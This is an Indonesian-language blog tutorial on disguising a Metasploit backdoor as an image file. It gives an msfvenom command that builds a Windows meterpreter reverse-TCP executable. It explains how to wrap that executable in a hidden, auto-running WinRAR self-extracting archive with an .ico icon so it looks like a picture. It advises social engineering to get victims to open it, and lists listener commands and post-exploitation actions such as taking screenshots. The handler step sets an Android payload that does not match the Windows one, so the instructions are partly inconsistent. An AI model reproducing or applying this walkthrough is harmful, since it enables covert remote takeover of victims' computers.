Cara Menyisipkan Backdoor Ke File Gambar (steganografi)

Cara menyisipkan backdoor ke gambar adalah salah satu usaha agar kita bisa memasukan backdoor ke perangakat korban tanpa diketahui. Teknik menyisipi gambar dengan playload sering disebut juga dengan steganografi.

Jika sebelumnya kita sudah belajar cara menyisipkan backdoor ke aplikasi yang terbilang cukup rumit. Di tutorial ini saya pastikan kamu akan bisa karena prosesnya cukup mudah.

Kamu hanya perlu membuat aplikasi backdoor dari metasploit termux, kemudian memasukannya kedalam file gambar. Selanjutnya tinggal mengatur agar gambar melakukan selft extracting.

Self extracting artinya saat ikon dari file ini di klik, secara otomatis file compress yang ada didalam akan langsung terekstrak dengan sendirinya.

Ikon file nya adalah gambar .Ico
file compress nya adalah gambar biasa dan backdoor.

Jadi saat gambar .ico di klik yang akan muncul adalah gambar biasa dan backdoor akan berjalan.

Pahamkan, cara kerja nya?

Namun sayangnya, gambar .Ico hanya support untuk windows (komputer). Jadi jika backdoor dalam bentuk gambar dikirimkan ke android tidak akan berpengaruh apa-apa. Dan tidak bisa untuk melakukan sadap whatsapp termux.

Oke, sekarang mari kita langsung ke tutorialnya saja. untuk langkah-langkahnya silahkan kalian ikuti dibawah ini:

Cara Menyisipkan Backdoor Ke Gambar Menggunakan Metasploit

1. Buat backdoor di metasploit

Silahkan jalankan metasploit yang sudah terinstal dengan menuliskan perintah berikut:

msfconsole

Selanjutnya masukan lagi perintah dibawah ini untuk langsung membuat backdoor:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.245 LPORT=4444 -f exe > virus.exe

# Virus.exe bisa kalian ubah menjadi nama lain, asalkan belakang nya tetap .exe.
# LHOST ganti dengan IP address kalian.
# LPORT sesuaikan saja.

Setelah backdoor berhasil dibuat, pindahkan ke penyimpanan internal.

2. Convert gambar menjadi .Ico

Kalian bisa memanfaatkan website http://icoconvert.com/

Langsung saja pada halaman awal website, upload gambar yang ingin disisipi backdoor.

upload gambar ke .ico converter
upload gambar ke .ico converter

Selanjutnya tekan convert .ico dan download hasil convert nya.

ico converter
ico converter

3. Compress gambar dan backdoor dengan ikon gambar.ico

Disini kita bisa menggunakan win rar, karena sudah ada opsi sfx (self extracting) archive nya.

Untuk panduannya silahkan kalian ikuti saja dengan gambar berikut.

  1. Tandai file backdoor dan gambar biasa lalu compress
    compress file gambar dan backdoor
  2. Pada opsi general WinRAR pilih best dan centang create sfx archive dan tekan ok
    best compress dan create sfx archive
  3. Geser ke menu advance dan pilih sfx option
    menu advance dan sfx option
  4. Pilih lagi menu setup dan pada kotak run after extraction tuliskan nama file backdoor dan file gambar biasa lalu ok
    menu setup dan kotak run after extraction
  5. Kemudian geser ke menu text and icon dan pada kotak load sfx icon from the file pilih gambar .Ico hasil convert sebelumnya
    menu text and icon
  6. Selanjutnya geser lagi ke menu modes dan pilih opsi hide all
    menu modes dan opsi hide all

Sampai disini backdoor sudah berhasil dimasukkan kedalam gambar.

Langkah selanjutnya tinggal mengirimkan backdoor ke target kalian.

Bagaimana cara kirim backdoor ke target?

Terserah kalian saja, yang penting bisa ada di perangkat target dan pastikan target juga membukanya.

Sebagai tips! Gunakan social engineering agar kalian bisa dengan mudah mengirimkan file gambar tersebut.

Apa yang harus dilakukan setelah gambar berisi backdoor ada di perangkat target?

Kalian tinggal menghubungkan backdoor tersebut dengan metasploit.

Caranya masuk ke metasploit terlebih dahulu dengan perintah berikut.

msfconsole

Selanjutnya masukan lagi perintah berikut ini.

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.43.245
set lport 4444
exploit

LHOST dan LPORT sesuaikan dengan yang kalian gunakan sebelumnya saat membuat backdoor.

Nah, jika sudah muncul meterpreter di metasploit kalian, itu artinya backdoor sudah terhubung.

metasploit meterpreter (backdoor sudah terhubung)

Selanjutnya tinggal memasukkan perintah apa yang kalian inginkan.

Misalnya untuk mengetahui perangkat apa yang digunakan terget, kalian bisa memasukkan perintah sysinfo

Dan jika ingin melakukan screenshot perangkat target, gunakan perintah screenshot.

Untuk perintah Exploit lainnya, silahkan lihat di metasploit help. Atau langsung cari tau di website resminya di metasploit.com

Oke sekarang kita sudah belajar cara menyisipkan backdoor ke gambar, sangat mudah dipahami kan? sekaran giliran kalian untuk mempraktekkannya.

Apabila ada kesulitan, silahkan tanyakan saja melalui kolom komentar. Terimakasih sudah membaca.